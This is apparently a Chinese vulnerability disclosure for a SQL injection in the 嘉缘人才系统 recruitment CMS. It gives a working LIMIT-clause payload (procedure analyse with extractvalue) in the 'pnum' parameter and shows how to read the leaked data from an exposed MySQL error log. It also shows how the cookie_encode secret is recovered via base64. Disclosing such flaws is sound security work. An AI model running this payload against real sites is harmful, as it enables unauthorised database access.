嘉缘人才系统sql注入(demo测试成功,limit注入实例)

### 简要描述： rt ### 详细说明： 直接黑盒发现 ``` http://v2014.rccms.com/person/resumelist.php?t=sideline&pnum= ``` 其中pnum为可控,随意输入一个字符发现mysql报错 [<img src="https://images.seebug.org/upload/201503/12195242bc5029d39e7e0b104532c02379e4940f.png" alt="18.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/12195242bc5029d39e7e0b104532c02379e4940f.png) 这个cms会把报错信息存在一个日志文件，如何获取这个日志文件，在前面发的洞中有详细的说明 [WooYun: 嘉缘人才系统最新版sql注入(直接出数据)](http://www.wooyun.org/bugs/wooyun-2015-0100830) 首先我们来获取$cfg['cookie_encode'] [<img src="https://images.seebug.org/upload/201503/121955463edf4d6282aec9265ca2aca337d20456.png" alt="19.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/121955463edf4d6282aec9265ca2aca337d20456.png) 把上面标注的base64解密，得到testUzEZa4962Q，其中test为我的用户名。 然后 ``` UzEZa4962Q ``` 就为$cfg['cookie_encode']。好了，找到之后，我们来构造poc 根据http://zone.wooyun.org/content/18220提供的方法 构造以下poc ``` http://v2014.rccms.com/person/resumelist.php?t=sideline&pnum=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` 然后访问mysql错误记录文件 ``` http://v2014.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt ``` 可以看到直接出数据了。 [<img src="https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png" alt="20.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png" alt="20.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png)